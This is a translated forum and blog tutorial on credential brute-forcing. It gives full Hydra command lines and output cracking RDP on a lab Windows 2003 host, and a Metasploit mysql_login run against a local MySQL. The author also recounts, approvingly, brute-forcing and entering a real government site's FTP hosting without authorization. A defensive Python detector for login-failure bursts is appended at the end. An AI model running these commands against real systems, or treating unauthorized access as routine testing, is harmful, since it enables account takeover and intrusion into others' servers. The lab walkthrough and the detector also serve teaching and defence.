A Brief Talk on the Importance of Brute-Forcing in Penetration Testing

First published on i春秋; I posted it on the forum once, now posting it again here on Zhihu, heh.


In security, the biggest vulnerability of all is the password. This article discusses what brute-forcing is good for in penetration testing.

Some of you may give up during a penetration test when you cannot find an injection point, a stored XSS, or any of the other usual vulnerabilities. But have you considered that brute-forcing also plays a huge role in penetration testing?

Last time I posted several write-ups in which I got in by brute-forcing with Burp; they went out under the team account, so search the forum for the W3bSafe team. Ahem.

Test environment

Kali

Windows Server 2003 host (the "03" box)

For brute-forcing back-end usernames and passwords, the best tool on Windows is without doubt Burp, but on Linux there is a particularly handy brute-forcing tool: hydra (the Hydra).

The official description, translated:

One of the biggest security holes are passwords, as every password security study shows. Hydra is a parallelized login cracker which supports numerous protocols to attack. New modules are easy to add; besides that, it is flexible and very fast.

Hydra was tested on Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OSX, and is made available under GPLv3 with a special OpenSSL license expansion.

Currently this tool supports:

AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Parameter description

root@xaiSec:~# hydra -help
Hydra v7.4.2 (c)2012 by van Hauser / THC & David Maciejak - for legal purposes only

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [server service [OPT]]|[service://server[:PORT][/OPT]]

Options:
 -R restore a previous aborted/crashed session
 -S perform an SSL connect
 -s PORT if the service is on a different default port, define it here
 -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
 -p PASS or -P FILE try password PASS, or load several passwords from FILE
 -x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
 -e nsr try "n" null password, "s" login as pass and/or "r" reversed login
 -u loop around users, not passwords (effective! implied with -x)
 -C FILE colon separated "login:pass" format, instead of -L/-P options
 -M FILE list of servers to be attacked in parallel, one entry per line
 -o FILE write found login/password pairs to FILE instead of stdout
 -f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
 -t TASKS run TASKS number of connects in parallel (per host, default: 16)
 -w / -W TIME wait time for responses (32s) / between connects per thread
 -4 / -6 prefer IPv4 (default) or IPv6 addresses
 -v / -V / -d verbose mode / show login+pass for each attempt / debug mode
 -U service module usage details
 server the target server (use either this OR the -M option)
 service the service to crack. Supported protocols: afp cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
 OPT some service modules support additional input (-U for module help)

Use the HYDRA_PROXY_HTTP/HYDRA_PROXY and HYDRA_PROXY_AUTH environment variables for a proxy setup.

Hydra is a tool to guess/crack valid login/password pairs - usage only allowed for legal purposes. The newest version is available at http://www.thc.org/thc-hydra
The following services were not compiled in: sapr3 oracle.

Examples:
 hydra -l john -p doe 192.168.0.1 ftp
 hydra -L user.txt -p defaultpw -S 192.168.0.1 imap PLAIN
 hydra -l admin -P pass.txt http-proxy://192.168.0.1
 hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/DIGEST-MD5

Naturally, let's first try brute-forcing the server.

We treat the 2003 host at 192.168.0.128 as the server.

The PHP environment is also running on that 2003 host.

192.168.0.128/ is treated as the site we want to penetrate.

Next comes reconnaissance. First we pretend we don't know this site's IP.

We ping it and learn that the site's IP is 192.168.0.128.

Next we use Hydra to brute-force it.

Here I threw together a random password dictionary and put it in the root directory. First, let me explain how to use Hydra when you already know the username is administrator.

The username is administrator.

Brute-forcing is fast, of course.

The output is as follows:

root@xaiSec:~# hydra 192.168.0.128 rdp -l administrator -P /root/pass -V
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2017-03-19 21:54:27
[WARNING] rdp servers often dont like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[DATA] 16 tasks, 1 server, 18 login tries (l:1/p:18), ~1 try per task
[DATA] attacking service rdp on port 3389
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "admin" - 1 of 18 [child 0]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "111" - 2 of 18 [child 1]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "22" - 3 of 18 [child 2]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 4 of 18 [child 3]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 5 of 18 [child 4]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 6 of 18 [child 5]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 7 of 18 [child 6]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 8 of 18 [child 7]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 9 of 18 [child 8]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2222" - 10 of 18 [child 9]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "333333333333" - 11 of 18 [child 10]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "fhdf" - 12 of 18 [child 11]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jg" - 13 of 18 [child 12]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 14 of 18 [child 13]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 15 of 18 [child 14]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "ng" - 16 of 18 [child 15]
[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 16 of 18 [child 14]
[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "ng" - 16 of 18 [child 15]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "" - 17 of 20 [child 1]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "j" - 18 of 20 [child 11]
[3389][rdp] host: 192.168.0.128 login: administrator password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-03-19 21:54:32

Look at the red line at the bottom:

[3389][rdp] host: 192.168.0.128 login: administrator password: admin

The username is administrator and the password is admin.

Now let's go over the parameters.

root@xaiSec:~# hydra 192.168.0.128 rdp -l administrator -P /root/pass -V

hydra <IP> <service/protocol> -l <the username to use> -P <dictionary location> -V <verbose, show every attempt>

With uppercase -L, you follow it with the location of your username dictionary (for the case where we don't know the username).

For example:

hydra 192.168.0.128 rdp -L /root/user -P /root/pass -V

The output is as follows:

root@xaiSec:~# hydra 192.168.0.128 rdp -L /root/user -P /root/pass -V
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2017-03-19 22:03:58
[WARNING] rdp servers often dont like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[DATA] 16 tasks, 1 server, 234 login tries (l:13/p:18), ~14 tries per task
[DATA] attacking service rdp on port 3389
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "admin" - 1 of 234 [child 0]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "111" - 2 of 234 [child 1]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "22" - 3 of 234 [child 2]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 4 of 234 [child 3]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 5 of 234 [child 4]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 6 of 234 [child 5]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 7 of 234 [child 6]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 8 of 234 [child 7]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 9 of 234 [child 8]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2222" - 10 of 234 [child 9]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "333333333333" - 11 of 234 [child 10]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "fhdf" - 12 of 234 [child 11]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jg" - 13 of 234 [child 12]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 14 of 234 [child 13]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 15 of 234 [child 14]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "ng" - 16 of 234 [child 15]
[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 16 of 234 [child 14]
[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "ng" - 16 of 234 [child 15]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "" - 17 of 235 [child 6]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "j" - 18 of 235 [child 3]
[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "" - 18 of 235 [child 6]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "admin" - 19 of 235 [child 7]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 20 of 235 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "22" - 21 of 235 [child 5]
[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "j" - 21 of 235 [child 3]
[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "" - 21 of 235 [child 6]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 21 of 235 [child 4]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "admin" - 21 of 235 [child 7]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "22" - 21 of 235 [child 5]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "22" - 21 of 236 [child 5]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 22 of 238 [child 2]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 22 of 238 [child 2]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 23 of 239 [child 13]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 23 of 239 [child 13]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 24 of 240 [child 1]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 25 of 240 [child 12]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 25 of 240 [child 1]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 25 of 240 [child 12]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 26 of 242 [child 9]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 27 of 242 [child 11]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 27 of 242 [child 9]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 27 of 243 [child 11]
[3389][rdp] host: 192.168.0.128 login: administrator password: admin
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2222" - 28 of 244 [child 0]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "333333333333" - 29 of 244 [child 8]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2222" - 29 of 244 [child 0]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "333333333333" - 29 of 245 [child 8]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "fhdf" - 30 of 246 [child 10]
[ATTEMPT] target 192.168.0.128 - login "fhfahreyrey" - pass "admin" - 37 of 246 [child 15]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "fhdf" - 37 of 247 [child 10]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "fhdf" - 37 of 247 [child 10]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "fhdf" - 37 of 247 [child 10]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 37 of 248 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "admin" - 55 of 248 [child 3]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 55 of 249 [child 4]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 55 of 249 [child 4]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 55 of 249 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "111" - 56 of 250 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "22" - 57 of 251 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 58 of 252 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 59 of 253 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 60 of 254 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 61 of 255 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 62 of 256 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 63 of 257 [child 4]
[ERROR] Too many connect errors to target, disabling rdp://192.168.0.128:3389
0 of 1 target successfully completed, 1 valid password found
[INFO] Writing restore file because 1 server scan could not be completed
[ERROR] 1 target was disabled because of too many errors
Hydra (http://www.thc.org/thc-hydra) finished at 2017-03-19 22:04:04

Connected successfully.

Heh, it's a local test after all~

Brute-forcing a shared web-hosting account (FTP)

hydra IP ftp -L /root/user -P /root/pass -V

Here I used a .gov site as the test, heh; it has already been submitted to 漏洞盒子 (Vulbox).

We can see that no matter what password is used, the login succeeds: the hosting account can be accessed without authorization. Let's log in.

That is scary; we really got in.

Of course, Metasploit also has plenty of brute-forcing modules.

Brute-forcing the database on port 3306. I have already set up a MySQL database on my Kali box.

Configuring Metasploit

msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(mysql_login) > set USERNAME test
USERNAME => test
msf auxiliary(mysql_login) > set PASS_FILE /root/pass
PASS_FILE => /root/pass
msf auxiliary(mysql_login) > run

[*] 127.0.0.1:3306 MYSQL - Found remote MySQL version 5.5.31
[*] 127.0.0.1:3306 MYSQL - [01/15] - Trying username:test with password:
[+] 127.0.0.1:3306 - SUCCESSFUL LOGIN test :
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) >

Explanation:

use auxiliary/scanner/mysql/mysql_login    // load the module
set RHOSTS 127.0.0.1                       // set the database address; it is my own machine, so 127.0.0.1
set USERNAME test                          // the MySQL user I created is test; if you don't know the user, set USER_FILE <dictionary path> and brute-force it too
set PASS_FILE /root/pass                   // use the dictionary at /root/pass
run                                        // start brute-forcing

[*] 127.0.0.1:3306 MYSQL - Found remote MySQL version 5.5.31
[*] 127.0.0.1:3306 MYSQL - [01/15] - Trying username:test with password:
[+] 127.0.0.1:3306 - SUCCESSFUL LOGIN test :
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

In the line

[+] 127.0.0.1:3306 - SUCCESSFUL LOGIN test :

the password after the colon is empty.

Connecting then succeeds as follows:

root@xaiSec:~# mysql -u test -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 54
Server version: 5.5.31-0+wheezy1 (Debian)

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

Because there is no password, we simply press Enter at the password prompt.

I remember there was a site called caimima or something that exploited human weaknesses (to build password guesses); it seems it can't be reached anymore. Ahem.

Of course, brute-forcing combined with social engineering makes a penetration tester far more effective.

Also, folks: are your server passwords weak? If so, I suggest using a mix of letters, digits and symbols~

-- W3bSafe team member 小愛_Joker
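A defender-side complement to the RDP and MySQL runs above, added here and not part of the original post: the 16 parallel tasks Hydra and mysql_login use produce a burst of failed logins from one source within seconds, and that burst is what a log-based detector keys on. The block parses MySQL-style "Access denied" error-log lines (the sample lines are constructed; the log_warnings=2 line format is assumed) and raises one alert per source host from a sliding window; the same windowing applies to RDP logon failures once they are parsed into (time, user, source) records.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample in MySQL 5.5 error-log style (log_warnings=2): a burst of
# denials from one source, as 16 parallel login tasks on port 3306 would produce.
SAMPLE_LOG = """\
170319 22:04:01 [Warning] Access denied for user 'test'@'127.0.0.1' (using password: YES)
170319 22:04:01 [Warning] Access denied for user 'test'@'127.0.0.1' (using password: YES)
170319 22:04:01 [Warning] Access denied for user 'dghfhf'@'127.0.0.1' (using password: YES)
170319 22:04:02 [Warning] Access denied for user 'dghfhf'@'127.0.0.1' (using password: YES)
170319 22:04:02 [Warning] Access denied for user 'admin'@'127.0.0.1' (using password: NO)
170319 22:04:02 [Warning] Access denied for user 'root'@'127.0.0.1' (using password: YES)
170319 22:04:03 [Warning] Access denied for user 'test'@'127.0.0.1' (using password: YES)
170319 22:04:04 [Warning] Access denied for user 'test'@'127.0.0.1' (using password: YES)
170319 22:09:00 [Warning] Access denied for user 'alice'@'10.0.0.5' (using password: YES)
170319 22:09:30 [Warning] Access denied for user 'alice'@'10.0.0.5' (using password: YES)
"""

LINE_RE = re.compile(
    r"^(\d{6} \d\d:\d\d:\d\d) \[Warning\] Access denied for user '([^']*)'@'([^']+)'")

def parse(line):
    """(timestamp, user, source_host) for a denied-login line, else None."""
    m = LINE_RE.match(line)
    return (datetime.strptime(m.group(1), "%y%m%d %H:%M:%S"), m.group(2), m.group(3)) if m else None

def detect_bruteforce(log_text, window_s=10, threshold=8):
    """Per source host, keep the failures of the last window_s seconds and alert
    once threshold is reached. Returns {host: {"count": n, "users": [...]}}."""
    recent = defaultdict(deque)        # host -> deque of (ts, user) in the window
    alerts = {}
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue                   # not a denied-login line; ignore
        ts, user, host = rec
        q = recent[host]
        q.append((ts, user))
        while (ts - q[0][0]).total_seconds() > window_s:
            q.popleft()                # drop failures older than the window
        if len(q) >= threshold:        # a spray across many users also trips this
            alerts[host] = {"count": len(q), "users": sorted({u for _, u in q})}
    return alerts
```

The two slow failures from 10.0.0.5 never reach the threshold, so only the burst from 127.0.0.1 is reported, together with the list of usernames it tried.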
